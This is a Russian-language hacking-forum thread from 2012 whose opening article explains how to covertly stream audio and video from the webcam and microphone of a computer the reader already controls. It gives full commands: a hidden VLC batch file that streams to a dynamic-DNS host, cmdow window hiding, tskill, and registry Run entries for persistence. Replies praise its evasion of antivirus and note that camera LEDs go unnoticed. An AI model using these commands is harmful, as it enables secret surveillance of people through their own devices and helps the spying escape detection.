|
|

16.11.2012, 21:19
|
|
Постоянный
Провел на форуме: 108975
|
|
Всем привет, в этой статье я хочу рассказать про то как можно настроить трансляцию видео/аудио с вашей вебкамеры. Где и как это использовать это уже ваше дело(можно например вставить на сайт), мне кажется весьма интересно иногда посмотреть что происходит в комнате где стоит наш дед к которому у нас уже есть доступ
1. Ставим VLC и создаем *.bat файл для запуска видео-аудио захвата
И так для начала установим vlc плеер: http://videolan.org/vlc/ После этого нам необходимо создать *.bat файл (назовем его start_vlc.bat)в котором и будем запускать vlc, ложим его в c:\windows\system32 команда для запуска видео/аудио захвата будет выглядеть так:
Код:
"C:\Program Files\VideoLAN\VLC\vlc.exe" -vvv --no-qt-notification --qt-start-minimized dshow://:dshow-vdev="твоя вебка" :dshow-adev="твой микрофон" :dshow-caching="200" :sout=#transcode{hq:,vcodec=h264,height=320,width=240,vb=800,scale=1,acodec=mpga,ab=128,channels=2,samplerate=44100}:std{access=http,mux=ts,dst=твой dyndns адрес:8080} --volume 100
Пример для Unix (Linux Debian 2.6.32-5-686, VLC 1.1.3)
Код:
cvlc -vvv v4l2:// :input-slave=alsa://plughw:1,0 :v4l2-standard=0 :file-caching=100 :sout='#transcode{hq:,vcodec=WMV2,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:http{mux=ts,dst=IP:PORT}' :no-sout-rtp-sap :no-sout-standard-sap :sout-keep
Где в параметре dshow-vdev="" укажите название вашей web камеры с которой и будет производиться видеозахват (посмотреть можно пуск->панель управления->система->диспечер устройств->устройство обработки изображений ниже увидите вашу вебкамеру я думаю у 99% людей она будет одна) В параметре dshow-adev="" укажем имя нашего микрофона, посмотреть можно (пуск->панель управления->звуки и аудиоустройства->аудио->запись звука) Также нам нужно позаботиться чтобы запуск был скрыт от пользователя, для этих целей используем утилитку cmdow commandline.co.uk/cmdow скачиваем ее и ложим рядом с нашим файлом start_vlc.bat в заглавии нашего файла пишем cmdow @ /HID, так же стоит подумать о закрытии всех процессов с именем vlc, для этого дополним наш файл командой tskill /A vlc, в результате наш файл принимает вид:
Код:
cmdow @ /HID \n
tskill /A vlc
"C:\Program Files\VideoLAN\VLC\vlc.exe" -vvv --no-qt-notification --qt-start-minimized dshow://:dshow-vdev="твоя вебка" :dshow-adev="твой микрофон" :dshow-caching="200" :sout=#transcode{hq:,vcodec=h264,height=320,width=240,vb=800,scale=1,acodec=mpga,ab=128,channels=2,samplerate=44100}:std{access=http,mux=ts,dst=testerlg.strangled.net:8080} --volume 100
2. Регистрация на DynDns хостинге и установка DynDns клиента
Далее перейдем к моменту как мы собираемся получать доступ к нашей камере? я думаю что у большинства пользователей в интернете нет своего постоянного внешнего ip адреса(если есть то просто пропустите этот пункт), выйти из этого положения нам поможет технология dyndns http://ru.wikipedia.org/wiki/DynDNS Для этого регистрируемся на сайте http://freedns.afraid.org/signup/ (пользуюсь этим хостингом так как dyndns.com стал платным) после ввода своих данных вы должны создать себе запись следующего вида: В поле Type выберите "A" (она уже выбрана по умолчанию) В поле Subdomain введите имя вашего домена(к примеру homemax) В поле Domain выберите интересующий вас домен(скорее всего mooo.com так как он самый короткий, но я выбрал другой ) В поле Destination введите свой внешний ip, узнать его можно например просто набрав в ya.ru "мой ip" после этого жмем кнопочку SAVE.
У меня к примеру это имеет следующий вид:
Далее нам необходимо установить dyndns клиент который собственно и будет реагировать на обновление нашего внешнего ip адреса и динамически обновлять эту информацию на хостинге. Я использую вот этот клиент http://www.techknowpro.com/freedns после его установки, во вкладке Settings вводим наши логин и пароль(как и на сайте, при необходимости добавляем правила в антивирусное ПО/файерволы).
3. Автоматический запуск DynDns и нашего *bat файла при загрузке компьютера
Далее нужно позаботиться что бы при загрузке ОС наш *.bat файл выполнялся автоматически, для этого с помощью regedit(пуск->выполнить->regedit) добавляем следующую запись в реестре.
Код:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Код:
Имя: vlc, Тип записи: REG_SZ, Значение: C:\WINDOWS\system32\start_vlc.bat
И тоже самое проделываем для нашего DynDns клиента.
Код:
Имя: dyndns, Тип записи: REG_SZ, Значение: C:\WINDOWS\cmdow.exe /run /hid "C:\Program Files\FreeDNS Update\FreeDNSUpdate.exe"
4. Автоматическое подключение инета при включении или перезагрузке компьютера
Нужно подумать как заставить подключаться интернет автоматически при включении компьютера, у меня используется vpn соединение, в настройках vpn подключения во вкладке "Параметры" убираем галочки с пунктов "Отображать ход подключения" и "Запрашивать имя, пароль, сертификат и.т.д" и просто ложим наше подключение в папку "Автозагрузка" у меня в windows XP(под Админом) данный метод работает. Теперь перезагружаем компьютер и тестируем, (для проверки запустите у себя vlc и попробуйте подключиться к самому себе
"Meдиа->открыть URL")
Ecли что то не работает смотрим вывод команды:
P.S.
У меня на моем железе это заметно жрет ресурсы, при желании хоть как то уменьшить потребление ресурсов советую внимательно выбирать кодеки (аудио/видео)
список поддерживаемых кодеков: http://wiki.videolan.org/Codec
Данные кодеки у меня использовали мин. системных ресурсов:
Код:
audio codec:
mpga MPEG audio recommended for portability)
video codec:
mp1v MPEG-1 Video - recommended for portability
В примере я специально выбрал кодек H263 и опцию :hq меня просто интересовало хорошее качество, думаю мало у кого еще есть такой комп динозавр как у меня
Скорее всего нового я ничего не напишу просто чуть напомню, если у вас доступ только через telnet не расстраивайтесь и помните про команды edit а также про echo и reg.
Пример c edit:
Код:
edit C:\windows\start_vlc.bat
Пример добавление в автозагрузку с помощью reg:
Код:
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v vlc /t REG_SZ /d C:\Windows\start_vlc.bat /f
Все действия были проделаны на win xp.
Это моя первая статья, сильно не пинайте, выслушаю дополнения
|
|
|

16.11.2012, 23:24
|
|
Познавший АНТИЧАТ
Провел на форуме: 6075534
|
|
Извращенец - не извращенец, но идея снятия видео с камеры используя VLC - достойна похвалы. Ибо, как минимум, это официальная тулза, не палящяяся антивирусами, в отличии от большинства троянов, которые надо время от времени криптовать + обновлять.
|
|
|

17.11.2012, 16:41
|
Провел на форуме: 6489333
|
|
Будет очень хорошо, если автор статьи или еще кто нибудь разовьет эту тему, и чем больше, тем лучше. Если статья существенно пополнится новыми идеями или реализациями этой, тогда закреплю.
|
|
|

17.11.2012, 18:07
|
|
Постоянный
|
|
Спасибо! буду обязательно стараться дополнять..
|
|
|

26.11.2012, 05:20
|
|
Новичок
Провел на форуме: 0
|
|
Спасибо!взял способ!сегодня завтра попробую настроить,как что отпишу..
|
|
|

27.11.2012, 01:25
|
|
Познающий
Провел на форуме: 306778
|
|
Как раз искал подобные статьи,спасибо
|
|
|

02.12.2012, 16:39
|
|
Новичок
Провел на форуме: 4002
|
|
Ого. Пригодилось.
|
|
|

02.12.2012, 17:12
|
|
Участник форума
Провел на форуме: 25106
|
|
У меня 2 вопроса:
1. для чего это нужно?
2. если камера будет включена - это запалят.
|
|
|

02.12.2012, 17:22
|
|
Постоянный
|
|
Сообщение от lock1122
У меня 2 вопроса:
1. для чего это нужно?
2. если камера будет включена - это запалят.
1. можно на сайт вставить, мне казалось что многим будет просто интересно я не совсем понимаюкак на подобный вопрос на этом форуме тебе и ответить..
2. Не на всех камерах есть диоды (если ты про это) а на некоторых настолько тусклые что их в дневное время практически и не видно.
|
|
|

02.12.2012, 17:50
|
|
Познающий
Провел на форуме: 23822
|
|
+ за статью, в целом расписал всё что нужно. Добавлю себе в комплект
|